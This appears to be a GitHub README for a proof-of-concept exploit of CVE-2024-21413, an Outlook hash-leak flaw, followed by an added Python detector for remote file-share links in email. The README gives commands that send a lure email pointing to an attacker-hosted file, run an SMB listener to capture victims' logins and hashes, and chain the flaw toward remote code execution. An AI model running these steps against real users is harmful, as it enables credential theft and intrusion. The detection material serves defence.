
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - CVE-2024-21413 POC


moh-expert/CVE-2024-21413-POC

 
 


CVE-2024-21413 - POC

Usage:

python CVE-2024-21413.py -host example.com -port 25 -from sender@example.com -recipient recipient@example.com -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

Note

r00tb1t: the shared test file (a Word document in this case) hosted on the attacker machine (xx.xx.xx.xx).

To ensure compliance with SPF, DKIM, and DMARC, use a legitimate IP and domain.

Make sure to install the pexpect library if you haven't already, using pip install pexpect.

Tips to execute the POC:

  • Run an SMB listener: impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp
  • Run the POC:

python CVE-2024-21413.py -host example.com -port 25 -from sender@example.com -recipient recipient@example.com -url example.com/path/to/shared/file/r0tb1t.rtf

  • Click on the link in the received mail, and BOOM, you should retrieve the login and hash in the listener.
  • Chain this CVE with CVE-2023-21716 to obtain RCE!
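
On the defensive side, a mail gateway or triage script can flag messages like the one this POC sends, since the hash leak depends on the client reaching out to a remote file share when the link is clicked. The following is an added example, not part of the repository: it assumes the link arrives as a file: URL or UNC path in an HTML anchor, and the function name remote_file_links and the sample message are constructed for illustration.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample message (not from the POC); 192.0.2.10 is a documentation address.
SAMPLE = """\
From: sender@example.com
To: recipient@example.com
Subject: constructed sample
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<a href="file://192.0.2.10/test/r0tb1t.rtf">shared document</a>
<a href="https://example.com/report">report</a>
<a href="file:///C:/Users/Public/notes.txt">local notes</a>
</body></html>
"""

# file: URL or backslash UNC path; group 1 is the host the client would contact.
_REMOTE = re.compile(r"^(?:file:[/\\]*|\\\\)([^/\\]+)[/\\]", re.I)
# Drive letters and loopback names do not leave the machine, so they are not flagged.
_NOT_REMOTE = re.compile(r"^(?:[a-z]:|localhost|127\.0\.0\.1|\.)$", re.I)

class _Hrefs(HTMLParser):
    """Collects href values of <a> tags (character references already decoded)."""
    def __init__(self):
        super().__init__()
        self.hrefs = []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.hrefs += [v for k, v in attrs if k == "href" and v]

def remote_file_links(raw_message):
    """Return (host, href) for each HTML link that points at a remote file share."""
    hits = []
    for part in message_from_string(raw_message).walk():
        if part.get_content_type() != "text/html":
            continue
        body = (part.get_payload(decode=True) or b"").decode(
            part.get_content_charset() or "utf-8", "replace")
        parser = _Hrefs()
        parser.feed(body)
        for href in parser.hrefs:
            m = _REMOTE.match(unquote(href.strip()))
            if m and not _NOT_REMOTE.match(m.group(1)):
                hits.append((m.group(1), href))
    return hits
```

A hit is a reason to quarantine or rewrite the link before delivery; blocking outbound SMB (TCP 445) at the perimeter stops the authentication attempt even if a link gets through.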

Caution

⚠️ Disclaimer: IMPORTANT: This script is provided for educational, ethical testing, and lawful use ONLY. Do not use it on any system or network without explicit permission. Unauthorized access to computer systems and networks is illegal, and users caught performing unauthorized activities are subject to legal action. The author is NOT responsible for any damage caused by the misuse of this script.
